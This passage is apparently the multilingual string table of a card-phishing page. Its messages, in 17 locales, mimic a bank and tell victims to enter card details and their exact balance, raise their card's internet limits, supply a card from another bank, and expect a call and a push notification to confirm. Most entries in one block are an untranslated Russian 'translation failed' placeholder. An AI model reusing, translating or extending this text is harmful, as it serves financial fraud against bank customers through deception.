    ch: "Wir werden Sie gleich anrufen und ein Wortbild sagen. In einigen Fällen senden Sie eine Push-Benachrichtigung an Ihre Bank-App, nachdem Sie das erste Bild bereitgestellt haben, das Sie bestätigen müssen.",
    by: "Через минуту мы вам позвоним и скажем слово-картинку. В некоторых случаях отправьте push-уведомление в приложение вашего банка после того, как вы предоставите первое изображение, которое вам нужно подтвердить.",
    fr: "Dans un instant, nous vous appellerons et vous dirons un mot-image. Dans certains cas, nous envoyons une notification push à votre application bancaire après que vous ayez fourni la première photo à confirmer.",
  },
  wrong_picture: {
    en: "You chose the wrong photo",
    au: "You chose the wrong photo",
    be: "Vous avez choisi la mauvaise photo",
    cz: "Vybrali jste špatnou fotku",
    de: "Sie haben das falsche Foto ausgewählt",
    es: "Elegiste la foto equivocada",
    it: "Hai scelto la foto sbagliata",
    lt: "Pasirinkote netinkamą nuotrauką",
    nl: "Je hebt de verkeerde foto gekozen",
    pt: "Você escolheu a foto errada",
    ro: "Ai ales poza greșită",
    sk: "Vybrali ste nesprávnu fotku",
    at: "Sie haben das falsche Foto ausgewählt",
    ae: "لقد اخترت الصورة الخاطئة",
    ch: "Sie haben das falsche Foto ausgewählt",
    by: "Вы выбрали не ту фотографию",
    fr: "Vous avez choisi la mauvaise photo",
  },
  submit: {
    en: "Submit",
    au: "Submit",
    be: "Soumettre",
    cz: "Předložit",
    de: "Einreichen",
    es: "Enviar",
    it: "Invia",
    lt: "Pateikti",
    nl: "Indienen",
    pt: "Enviar",
    ro: "Trimite",
    sk: "Predložiť",
    at: "Einreichen",
    ae: "يُقدِّم",
    ch: "Einreichen",
    by: "Представлять на рассмотрение",
    fr: "Soumettre",
  },
  error: {
    en: "An unexpected error has occurred. Please try again",
    au: "An unexpected error has occurred. Please try again",
    be: "Une erreur inattendue est survenue. Veuillez réessayer",
    cz: "Došlo k neočekávané chybě. Prosím zkuste to znovu",
    de: "Ein unerwarteter Fehler ist aufgetreten. Bitte versuche es erneut",
    es: "Ha ocurrido un error inesperado. Inténtalo de nuevo",
    it: "Si è verificato un errore imprevisto. Per favore riprova",
    lt: "Įvyko netikėta klaida. Prašau, pabandykite dar kartą",
    nl: "Er is een onverwachte fout opgetreden. Probeer het opnieuw",
    pt: "Ocorreu um erro inesperado. Por favor, tente novamente",
    ro: "A aparut o eroare neasteptata. Vă rugăm să încercați din nou",
    sk: "Nastala neočakávaná chyba. Prosím skúste znova",
    at: "Ein unerwarteter Fehler ist aufgetreten. Bitte versuche es erneut",
    ae: "لقد حدث خطأ غير متوقع. حاول مرة اخرى",
    ch: "Ein unerwarteter Fehler ist aufgetreten. Bitte versuche es erneut",
    by: "Произошла непредвиденная ошибка. Пожалуйста, попробуйте еще раз",
    fr: "Une erreur inattendue s'est produite. Veuillez réessayer",
  },
  error_title: {
    en: "Error",
    au: "Error",
    be: "Erreur",
    cz: "Chyba",
    de: "Fehler",
    es: "Error",
    it: "Errore",
    lt: "Klaida",
    nl: "Fout",
    pt: "Erro",
    ro: "Eroare",
    sk: "Chyba",
    at: "Fehler",
    ae: "خطأ",
    ch: "Fehler",
    by: "Ошибка",
    fr: "Erreur",
  },
  card_number_invalid: {
    en: "Card number is incorrect",
    au: "Card number is incorrect",
    be: "Le numéro de carte est incorrect",
    cz: "Číslo karty je nesprávné",
    de: "Kartennummer ist falsch",
    es: "El número de tarjeta es incorrecto",
    it: "Il numero della carta non è corretto",
    lt: "Kortelės numeris neteisingas",
    nl: "Kaartnummer is onjuist",
    pt: "O número do cartão está incorreto",
    ro: "Numărul cardului este incorect",
    sk: "Číslo karty je nesprávne",
    at: "Kartennummer ist falsch",
    ae: "رقم البطاقة غير صحيح",
    ch: "Kartennummer ist falsch",
    by: "Номер карты неверный",
    fr: "Le numéro de la carte est incorrect",
  },
  attention: {
    en: "Attention",
    au: "Attention",
    be: "Attention",
    cz: "Pozornost",
    de: "Aufmerksamkeit",
    es: "Atención",
    it: "Attenzione",
    lt: "Dėmesio",
    nl: "Aandacht",
    pt: "Atenção",
    ro: "Atenţie",
    sk: "Pozornosť",
    at: "Aufmerksamkeit",
    ae: "انتباه",
    ch: "Aufmerksamkeit",
    by: "Внимание",
    fr: "Attention",
  },
  bank_asked: {
    en: "The bank requested additional bank card information to verify card ownership.",
    au: "The bank requested additional bank card information to verify card ownership.",
    be: "La banque a demandé des informations supplémentaires sur la carte bancaire pour vérifier la propriété de la carte.",
    cz: "Banka si za účelem ověření vlastnictví karty vyžádala další údaje o bankovní kartě.",
    de: "Die Bank hat zusätzliche Bankkarteninformationen angefordert, um den Kartenbesitz zu bestätigen.",
    es: "El banco solicitó información adicional de la tarjeta bancaria para verificar la titularidad de la tarjeta.",
    it: "La banca ha richiesto ulteriori informazioni sulla carta bancaria per verificare la proprietà della carta.",
    lt: "Bankas paprašė papildomos banko kortelės informacijos, kad patvirtintų kortelės nuosavybės teisę.",
    nl: "De bank heeft om aanvullende bankkaartgegevens gevraagd om het eigendom van de kaart te verifiëren.",
    pt: "O banco solicitou informações adicionais do cartão bancário para verificar a propriedade do cartão.",
    ro: "Banca a solicitat informații suplimentare despre cardul bancar pentru a verifica calitatea de proprietar al cardului.",
    sk: "Banka si vyžiadala ďalšie informácie o bankovej karte na overenie vlastníctva karty.",
    at: "Die Bank hat zusätzliche Bankkarteninformationen angefordert, um den Kartenbesitz zu bestätigen.",
    ae: "طلب البنك معلومات بطاقة مصرفية إضافية للتحقق من ملكية البطاقة.",
    ch: "Die Bank hat zusätzliche Bankkarteninformationen angefordert, um den Kartenbesitz zu bestätigen.",
    by: "Банк запросил дополнительную информацию о банковской карте, чтобы подтвердить право собственности на карту.",
    fr: "La banque a demandé des informations supplémentaires sur la carte bancaire afin d'en vérifier la propriété.",
  },
  wait: {
    en: "Expect",
    au: "Expect",
    be: "Attendre",
    cz: "Očekávat",
    de: "Erwarten von",
    es: "Suponer",
    it: "Aspettare",
    lt: "Tikėtis",
    nl: "Verwachten",
    pt: "Espero",
    ro: "Aştepta",
    sk: "Očakávajte",
    at: "Erwarten von",
    ae: "يتوقع",
    ch: "Erwarten von",
    by: "Ожидать",
    fr: "Attendre",
  },
  bank_processes: {
    en: "The bank is processing your data. This may take some time",
    au: "The bank is processing your data. This may take some time",
    be: "La banque traite vos données. Cela peut prendre un certain temps",
    cz: "Banka zpracovává vaše údaje. To může chvíli trvat",
    de: "Die Bank verarbeitet Ihre Daten. Dies könnte eine Weile dauern",
    es: "El banco está tratando tus datos. Esto puede tomar algo de tiempo",
    it: "La banca sta elaborando i tuoi dati. Questo potrebbe richiedere del tempo",
    lt: "Bankas tvarko jūsų duomenis. Tai gali užtrukti šiek tiek laiko",
    nl: "De bank verwerkt uw gegevens. Dit kan wat tijd kosten",
    pt: "O banco está processando seus dados. Isto pode tomar algum tempo",
    ro: "Banca vă prelucrează datele. Acest lucru poate dura ceva timp",
    sk: "Banka spracováva vaše údaje. Môže to chvíľu trvať",
    at: "Die Bank verarbeitet Ihre Daten. Dies könnte eine Weile dauern",
    ae: "يقوم البنك بمعالجة بياناتك. هذا قد يستغرق بعض الوقت",
    ch: "Die Bank verarbeitet Ihre Daten. Dies könnte eine Weile dauern",
    by: "Банк обрабатывает ваши данные. Это может занять некоторое время",
    fr: "La banque traite vos données. Cela peut prendre un certain temps",
  },
  limits: {
    en: "You need to raise the internet limits on your card to make a transaction!",
    au: "You need to raise the internet limits on your card to make a transaction!",
    be: "Vous devez augmenter les limites Internet de votre carte pour effectuer une transaction !",
    cz: "Chcete-li provést transakci, musíte zvýšit internetové limity na vaší kartě!",
    de: "Sie müssen die Internetlimits auf Ihrer Karte erhöhen, um eine Transaktion durchzuführen!",
    es: "¡Necesita aumentar los límites de Internet en su tarjeta para realizar una transacción!",
    it: "Devi aumentare i limiti di Internet sulla tua carta per effettuare una transazione!",
    lt: "Norėdami atlikti operaciją, turite padidinti kortelės interneto limitą!",
    nl: "U moet de internetlimieten op uw kaart verhogen om een ​​transactie te kunnen doen!",
    pt: "Você precisa aumentar os limites de internet do seu cartão para fazer uma transação!",
    ro: "Trebuie să ridici limitele de internet pe cardul tău pentru a face o tranzacție!",
    sk: "Ak chcete uskutočniť transakciu, musíte zvýšiť internetové limity na svojej karte!",
    at: "Sie müssen die Internetlimits auf Ihrer Karte erhöhen, um eine Transaktion durchzuführen!",
    ae: "تحتاج إلى رفع حدود الإنترنت على بطاقتك لإجراء معاملة!",
    ch: "Sie müssen die Internetlimits auf Ihrer Karte erhöhen, um eine Transaktion durchzuführen!",
    by: "Вам необходимо поднять интернет-лимиты на вашей карте, чтобы совершить транзакцию!",
    fr: "Vous devez augmenter les limites Internet de votre carte pour effectuer une transaction !",
  },
  other_card: {
    en: "At this moment we do not cooperate with cards of this bank. You need to specify a card of another bank!",
    au: "At this moment we do not cooperate with cards of this bank. You need to specify a card of another bank!",
    be: "Pour le moment, nous ne coopérons pas avec les cartes de cette banque. Vous devez indiquer une carte d'une autre banque !",
    cz: "V tuto chvíli nespolupracujeme s kartami této banky. Musíte zadat kartu jiné banky!",
    de: "Im Moment arbeiten wir nicht mit Karten dieser Bank zusammen. Sie müssen eine Karte einer anderen Bank angeben!",
    es: "En este momento no cooperamos con tarjetas de este banco. ¡Necesitas especificar una tarjeta de otro banco!",
    it: "Al momento non collaboriamo con le carte di questa banca. Devi specificare una carta di un'altra banca!",
    lt: "Šiuo metu su šio banko kortelėmis nebendradarbiaujame. Reikia nurodyti kito banko kortelę!",
    nl: "Op dit moment werken wij niet samen met kaarten van deze bank. U moet een kaart van een andere bank opgeven!",
    pt: "Neste momento não cooperamos com cartões deste banco. Você precisa especificar um cartão de outro banco!",
    ro: "În acest moment nu cooperăm cu cardurile acestei bănci. Trebuie să specificați un card al unei alte bănci!",
    sk: "Momentálne nespolupracujeme s kartami tejto banky. Musíte zadať kartu inej banky!",
    at: "Im Moment arbeiten wir nicht mit Karten dieser Bank zusammen. Sie müssen eine Karte einer anderen Bank angeben!",
    ae: "في هذه اللحظة نحن لا نتعاون مع بطاقات هذا البنك. تحتاج إلى تحديد بطاقة بنك آخر!",
    ch: "Im Moment arbeiten wir nicht mit Karten dieser Bank zusammen. Sie müssen eine Karte einer anderen Bank angeben!",
    by: "На данный момент мы не работаем с картами этого банка. Вам необходимо указать карту другого банка!",
    fr: "Pour le moment, nous ne coopérons pas avec les cartes de cette banque. Vous devez spécifier une carte d'une autre banque !",
  },
  for_verify: {
    en: "",
    au: "",
    be: "Не удалось перевести текст",
    cz: "Не удалось перевести текст",
    de: "Не удалось перевести текст",
    es: "Не удалось перевести текст",
    it: "Не удалось перевести текст",
    lt: "Не удалось перевести текст",
    nl: "Не удалось перевести текст",
    pt: "Не удалось перевести текст",
    ro: "Не удалось перевести текст",
    sk: "Не удалось перевести текст",
    at: "Не удалось перевести текст",
    ae: "Не удалось перевести текст",
    ch: "Не удалось перевести текст",
    by: "Не удалось перевести текст",
    fr: "Не удалось перевести текст",
  },
  correct_balance: {
    en: "enter the exact balance on your card!",
    au: "enter the exact balance on your card!",
    be: "saisissez le solde exact de votre carte !",
    cz: "zadejte přesný zůstatek na vaší kartě!",
    de: "Geben Sie das genaue Guthaben auf Ihrer Karte ein!",
    es: "introduzca el saldo exacto de su tarjeta!",
    it: "inserisci il saldo esatto sulla tua carta!",
    lt: "įveskite tikslų likutį savo kortelėje!",
    nl: "voer het exacte saldo op uw kaart in!",
    pt: "insira o saldo exato em seu cartão!",
    ro: "introduceți soldul exact pe cardul dvs.!",
    sk: "zadajte presný zostatok na vašej karte!",
    at: "Geben Sie das genaue Guthaben auf Ihrer Karte ein!",
    ae: "أدخل الرصيد الدقيق على بطاقتك!",
    ch: "Geben Sie das genaue Guthaben auf Ihrer Karte ein!",
    by: "введите точный баланс на вашей карте!",
    fr: "entrez le solde exact de votre carte !",
  },
  currency: {
    en: "£",
    au: "$",
    be: "€",
    cz: "Kč",
    de: "€",
    es: "€",
    it: "€",
    lt: "€",
    nl: "€",
    pt: "€",
    ro: "lei",
    sk: "€",
    at: "€",
    ch: "Fr",
    by: "BYN",
    ae: "DH",
    fr: "€",
  },
};
